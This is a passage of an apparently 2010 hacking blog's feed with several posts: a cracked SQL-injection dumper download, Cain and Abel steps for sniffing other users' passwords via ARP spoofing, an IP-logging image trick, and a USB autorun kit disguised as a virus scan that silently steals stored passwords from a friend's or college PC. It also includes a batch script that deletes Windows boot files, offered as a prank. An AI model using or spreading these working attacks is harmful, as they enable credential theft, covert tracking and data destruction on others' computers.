&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiACJ0U6gJup0BK2YGRo0-ksDrPlbz2zJ7lnTNhpm57mBCfP41tZqQWa9OVyKAiZhcLm7GuYA5oHiiZgPD0-LyfyTQA1zDs2a8ITBC_TKS31WfGIPMlmhrfqHksTT5Hy_BoPXoOzVQ_Jh4N/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiACJ0U6gJup0BK2YGRo0-ksDrPlbz2zJ7lnTNhpm57mBCfP41tZqQWa9OVyKAiZhcLm7GuYA5oHiiZgPD0-LyfyTQA1zDs2a8ITBC_TKS31WfGIPMlmhrfqHksTT5Hy_BoPXoOzVQ_Jh4N/s400/5.JPG" width="400" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;Tools: for cracking passwords and Hex vales&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi08MmvVzyEAAYr7VdoP2ytXrYz3NJwcSKD0IweFTHiARAX3wJnqhNVPp0epsOx-evIXGB1Q0bg0dfwXi_I4kaT2NLtJTv44cGVj6GW0BuV-wLV6WoFlR1J0wWnnRQZfiRBowjWHGsB0JnB/s1600/6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi08MmvVzyEAAYr7VdoP2ytXrYz3NJwcSKD0IweFTHiARAX3wJnqhNVPp0epsOx-evIXGB1Q0bg0dfwXi_I4kaT2NLtJTv44cGVj6GW0BuV-wLV6WoFlR1J0wWnnRQZfiRBowjWHGsB0JnB/s400/6.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt; &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
DOWNLOAD FROM HERE:&lt;br /&gt;
&lt;br /&gt;
&lt;a class="normal12blue" href="http://www.ziddu.com/download/8760628/MySQLiDumper.rar.html"&gt;http://www.ziddu.com/download/8760628/MySQLiDumper.rar.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/1260730140322842717/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/my-solidumper-worth-50-cracked.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/1260730140322842717" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/1260730140322842717" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/my-solidumper-worth-50-cracked.html" rel="alternate" title="My SOLiDumper worth $50 cracked!!!" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYpFaEksx9aJ25afI8cTJp78CMBjIkywX7j0Sa9etb9GCZAqGgLWpWEklvknulz5LWgqvEt7tNWdgtvnoV9XvUmcATuNgEMYNQAOUm0_JS7hmCHXct8u5oT_htXCPXW385J2ucOVhW9OOG/s72-c/1.JPG" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-4424753316171435701</id><published>2010-02-26T23:34:00.001+05:30</published><updated>2010-02-26T23:44:06.865+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><title type="text">Hack Computers using Cain and Abel</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjThfTg7SucWLRoCuDlKkGSCdkKCvichjht6iCJqcxmxqdog4UyCRQBLgnjILP0qibrZLxhR88wJWhtq5m8U0LDL_ceH4-a2Ip78XUc7mJShlZX03yEIVE7T5VfLDd4pSNZsuTZkv2vsQc/s1600/cainabel.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjThfTg7SucWLRoCuDlKkGSCdkKCvichjht6iCJqcxmxqdog4UyCRQBLgnjILP0qibrZLxhR88wJWhtq5m8U0LDL_ceH4-a2Ip78XUc7mJShlZX03yEIVE7T5VfLDd4pSNZsuTZkv2vsQc/s400/cainabel.gif" width="400" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span style="font-weight: bold;"&gt;Cain and Abel&lt;/span&gt; (sometimes called simply "Cain") is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, &lt;a href="http://rafayhackingarticles.blogspot.com/2009/03/hack-using-brute-force.html"&gt;brute force&lt;/a&gt; and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;
Cain &amp;amp; Abel is a useful tool for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Status with virus scanners&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Some virus scanners, notably &lt;a href="http://www.avast.com/"&gt;Avast&lt;/a&gt;! detect Cain and Abel as 'malware' "Win32:Cain-B [Tool]". It's classified in Avast! as "Other potentially dangerous program". The author, and owner of oxid.it states that his programs are not Malware. Even if Cain's install directory, as well as the word "Cain", are added to Avast's exclude list, the real-time scanner will stop Cain from functioning. The latest version of Avast no longer blocks &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;The Tutorial:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;there are a few requirements.&lt;br /&gt;
&lt;br /&gt;
* Download Cain and Abel from &lt;a href="http://www.oxid.it/" onclick="" target="_blank"&gt;www.oxid.it&lt;/a&gt;&lt;br /&gt;
* Should have a switched LAN. (Most ISPs other than BSNL provide broadband via LAN, e.g. SIFY, HATHWAY, local Cable internet connections)&lt;br /&gt;
* Any Microsoft Windows operating system.If you are not sure about being on a switched network, continue the steps, until you find out.&lt;br /&gt;
&lt;br /&gt;
1. Download and install Cain and Able from the link given above.&lt;br /&gt;
&lt;br /&gt;
2. Start Cain and Abel (requires admin privileges in Vista), go to the sniffer tab, click on the configure menu, select your NIC, check 'start sniffer on startup', press 'OK'.&lt;br /&gt;
&lt;br /&gt;
3. Click on the 'Start / Stop Sniffer' (the 2nd) button on the toolbar. Now click the blue '+' (plus) sign (this is the 7th button on the toolbar). Check 'All Tests' and click 'OK'.&lt;br /&gt;
&lt;br /&gt;
4. After the scan is complete, if you are on a switched network then, you must be able to see many IP and MAC addresses in this pane. If you don't see any IP other than your own, probably you are not on a switched network.&lt;br /&gt;
&lt;br /&gt;
5. Notice the tabs on the bottom, HOSTS, APR, Routing, Passwords, and VoIP. You are currently on the HOSTS tab, select the APR tab click on the 'top pane' and click the 'blue +' (7th on toolbar).&lt;br /&gt;
&lt;br /&gt;
6. Now you will again see the IP &amp;amp; MAC address (in the left pane) you saw in Step 5. From this list, select your 'Gateway IP', (this will mostly be something like 192.xxx.xxx.1 or 10.xxx.xxx.1 etc; check your network properties for more info on gateway.) after selecting your 'Gateway IP Address' (now some IP will appear on the right); drag and select all the entries in the right pane, and click 'OK'.&lt;br /&gt;
&lt;br /&gt;
7. Now click on the 'Start/Stop APR' (the 3rd) button on the toolbar. You will see 'HALF ROUTING' and 'FULL ROUTING' entries in the lower pane.&lt;br /&gt;
&lt;br /&gt;
8. Now go to the Passwords tab on the bottom. Slowly you will see passwords appearing in this section; most will be under HTTP.&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://images.orkut.com/orkut/photos/OgAAAO9NuOov6Nb9T41ymu8BsOfQ-f9GG46Iruf32gvZGtK1-bMwlyqFyzv7Qvy9lSqbPc5Y3uPgjPHuwjxkFaMZOvsAm1T1UHlBaW_K6mfcMmL2L447AvPb5rkn.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="283" src="http://images.orkut.com/orkut/photos/OgAAAO9NuOov6Nb9T41ymu8BsOfQ-f9GG46Iruf32gvZGtK1-bMwlyqFyzv7Qvy9lSqbPc5Y3uPgjPHuwjxkFaMZOvsAm1T1UHlBaW_K6mfcMmL2L447AvPb5rkn.jpg" width="400" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;The password section gives you full details on the capture, including Username, password, URL, etc. Any person who was online during the time you completed Steps 3 – 5, will be affected, and you will have access to their passwords. &lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/4424753316171435701/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/hack-computers-using-cain-and-abel.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/4424753316171435701" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/4424753316171435701" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/hack-computers-using-cain-and-abel.html" rel="alternate" title="Hack Computers using Cain and Abel" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjThfTg7SucWLRoCuDlKkGSCdkKCvichjht6iCJqcxmxqdog4UyCRQBLgnjILP0qibrZLxhR88wJWhtq5m8U0LDL_ceH4-a2Ip78XUc7mJShlZX03yEIVE7T5VfLDd4pSNZsuTZkv2vsQc/s72-c/cainabel.gif" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-310654662855664621</id><published>2010-02-24T23:47:00.002+05:30</published><updated>2010-02-25T00:46:45.636+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Blogger"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">Protect your blog post from being copied.</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://tweetmato.com/images/2009/10/Protect-Your-Tweets.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://tweetmato.com/images/2009/10/Protect-Your-Tweets.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;You must have noticed that most of blogger sites have disabled copy paste and right click function, so that their hard work on writing blog cannot be copied by others.&lt;br /&gt;
Here's the trick to use this function.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;For disabling copy paste function:&lt;/b&gt;&lt;br /&gt;
&amp;gt;Login to ur blogger&lt;br /&gt;
&amp;gt;Layout&lt;br /&gt;
&amp;gt;Edit HTML&lt;br /&gt;
&amp;gt;Search (ctrl+f) for the head  tag.&lt;br /&gt;
&amp;nbsp;&amp;gt;Just below this tag copy paste this script:&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;SCRIPT:::::::::: &lt;a href="http://tinypaste.com/ee073"&gt;http://tinypaste.com/ee073&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;For disabling right click function:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;gt;Login to ur blogger&lt;br /&gt;
&amp;gt;Layout&lt;br /&gt;
&amp;gt;Page Element&lt;br /&gt;
&amp;gt;Ad a gadget&lt;br /&gt;
&amp;gt;HTML/Javascript&lt;br /&gt;
&amp;gt;Copy paste and save this script&lt;br /&gt;
&lt;br /&gt;
SCRIPT:::::::::: &lt;a href="http://tinypaste.com/07402"&gt;http://tinypaste.com/07402&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Save the template and view your blog !!!&lt;br /&gt;
&lt;br /&gt;
Note: download ur full template before applying the tweak, incase u need backup.&lt;br /&gt;
&lt;br /&gt;
&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/310654662855664621/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/protect-your-blogger-from-being-copied.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/310654662855664621" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/310654662855664621" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/protect-your-blogger-from-being-copied.html" rel="alternate" title="Protect your blog post from being copied." type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-4543621209383773941</id><published>2010-02-24T00:22:00.001+05:30</published><updated>2010-02-26T23:39:56.946+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="PHP"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">Get IP logs using image file.</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://homepage.ntlworld.com/inwinter/media/sygate_firewall_log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="243" src="http://homepage.ntlworld.com/inwinter/media/sygate_firewall_log.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Step 1:&lt;br /&gt;
Register for a free web hosting site at &lt;br /&gt;
www.x10hosting.com or www.0fees.net.&lt;br /&gt;
&lt;br /&gt;
Step 2:&lt;br /&gt;
Upload the image file that you want to sent or display to your friend.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Step3:&lt;br /&gt;
Open notepad and copy paste the following code from&lt;br /&gt;
&lt;br /&gt;
www.tinypaste.com/64c62&lt;br /&gt;
Save it as&lt;span style="color: red;"&gt; ip.php.&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;(note: if ur image file is in jpg format, replace png by jpg by pressing ctrl+h.)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Step 4:&lt;br /&gt;
Open notepad and just save it as&lt;span style="color: red;"&gt; iplog.log&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Step 5:&lt;br /&gt;
Goto ur registered hosting site in step 1. Upload &lt;span style="color: red;"&gt;ip.php&lt;/span&gt; and &lt;span style="color: red;"&gt;iplog.log&lt;/span&gt; in the same directory where your image is uploaded.&lt;br /&gt;
&lt;br /&gt;
Step 6:&lt;br /&gt;
Now test the ip.php file by opening it. Now ur php file will display the image file. To check whether it logging ip address, open the iplog.log file&lt;br /&gt;
Just send the ip.php link to your friend, u will get his ip address in iplog.log &lt;br /&gt;
&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/4543621209383773941/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/get-ip-logs-using-image-file.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/4543621209383773941" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/4543621209383773941" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/get-ip-logs-using-image-file.html" rel="alternate" title="Get IP logs using image file." type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-3214248019029124950</id><published>2010-02-23T23:44:00.001+05:30</published><updated>2010-02-23T23:46:50.209+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">Hack Passwords using USB Drive</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.tramaweb.com.br/upload/editor/Image/PenDrive_ReadyBoost_1_gde.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="133" src="http://www.tramaweb.com.br/upload/editor/Image/PenDrive_ReadyBoost_1_gde.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;Today I will show you how to hack Passwords using an USB Pen Drive. &lt;br /&gt;
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. &lt;br /&gt;
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friends/college Computer. &lt;br /&gt;
We need the following tools to create our rootkit:&lt;br /&gt;
&lt;br /&gt;
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.&lt;br /&gt;
&lt;br /&gt;
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.&lt;br /&gt;
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0&lt;br /&gt;
&lt;br /&gt;
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more&lt;br /&gt;
&lt;br /&gt;
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.&lt;br /&gt;
____________________________________________________________________________&lt;br /&gt;
Here is a step by step procedre to create the password hacking toolkit:&lt;br /&gt;
&lt;br /&gt;
NOTE: You must temporarily disable your antivirus before following these steps.&lt;br /&gt;
&lt;br /&gt;
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.&lt;br /&gt;
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.&lt;br /&gt;
&lt;a href="http://uploading.com/files/9b5365em/HackingPassByUSB.rar/"&gt;Click here&lt;/a&gt; to download tools.&lt;br /&gt;
&lt;br /&gt;
2. Create a new Notepad and write the following text into it:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="prettyprint"&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="pln"&gt;autorun&lt;/span&gt;&lt;span class="pun"&gt;]&lt;/span&gt;&lt;span class="pln"&gt;
open&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="pln"&gt;launch&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;bat
ACTION&lt;/span&gt;&lt;span class="pun"&gt;=&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="typ"&gt;Perform&lt;/span&gt;&lt;span class="pln"&gt; a &lt;/span&gt;&lt;span class="typ"&gt;Virus&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="typ"&gt;Scan&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;
save the Notepad and rename it from&lt;br /&gt;
&lt;br /&gt;
New Text document.txt to autorun.inf&lt;br /&gt;
&lt;br /&gt;
Now copy theautorun.inf file onto your USB pendrive.&lt;br /&gt;
&lt;br /&gt;
3. Create another Notepad and write the following text onto it:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;start mspass&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;exe &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;stext mspass&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;txt

start mailpv&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;exe &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;stext mailpv&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;txt

start iepv&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;exe &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;stext iepv&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;txt

start pspv&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;exe &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;stext pspv&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;txt

start passwordfox&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;exe &lt;/span&gt;&lt;span class="pun"&gt;/&lt;/span&gt;&lt;span class="pln"&gt;stext passwordfox&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;txt&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;
save the Notepad and rename it from&lt;br /&gt;
&lt;br /&gt;
New Text document.txt to launch.bat&lt;br /&gt;
&lt;br /&gt;
Copy the launch.bat file also to your USB drive.&lt;br /&gt;
&lt;br /&gt;
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friends PC or on your college computer. Just follow these steps&lt;br /&gt;
&lt;br /&gt;
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).&lt;br /&gt;
&lt;br /&gt;
2. In the pop-up window, select the first option (Perform a Virus Scan).&lt;br /&gt;
&lt;br /&gt;
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.&lt;br /&gt;
&lt;br /&gt;
4. Remove the pendrive and you'll see the stored passwords in the .TXT files.&lt;br /&gt;
&lt;br /&gt;
This hack works on Windows 2000, XP,Vista and 7&lt;br /&gt;
&lt;br /&gt;
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.&lt;br /&gt;
&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/3214248019029124950/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/hack-passwords-using-usb-drive.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/3214248019029124950" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/3214248019029124950" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/hack-passwords-using-usb-drive.html" rel="alternate" title="Hack Passwords using USB Drive" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-5052651338079048944</id><published>2010-02-23T23:20:00.000+05:30</published><updated>2010-02-23T23:20:25.199+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">Shutdown a PC forever !!!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.chileangeek.com/wp-content/uploads/2009/09/shut-down.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://www.chileangeek.com/wp-content/uploads/2009/09/shut-down.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Open up notepad and copy , paste the code below. Save it as a .bat file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
@echo off&lt;br /&gt;
attrib -r -s -h c:\autoexec.bat&lt;br /&gt;
del c:\autoexec.bat&lt;br /&gt;
attrib -r -s -h c:\boot.ini&lt;br /&gt;
del c:\boot.ini&lt;br /&gt;
attrib -r -s -h c:\ntldr&lt;br /&gt;
del c:\ntldr&lt;br /&gt;
attrib -r -s -h c:\windows\win.ini&lt;br /&gt;
del c:\windows\win.ini&lt;br /&gt;
&lt;br /&gt;
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...&lt;br /&gt;
&lt;br /&gt;
REMEMBER - DO NOT CLICK THIS FILE.&lt;br /&gt;
&lt;br /&gt;
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!              &lt;br /&gt;
&lt;div id="ui-datepicker-div" style="display: none;"&gt;&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/5052651338079048944/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/shutdown-pc-forever.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5052651338079048944" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5052651338079048944" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/shutdown-pc-forever.html" rel="alternate" title="Shutdown a PC forever !!!" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-8659219472769866156</id><published>2010-02-21T23:12:00.002+05:30</published><updated>2010-02-22T23:05:50.270+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><title type="text">Goolag: Google Database Scanner</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 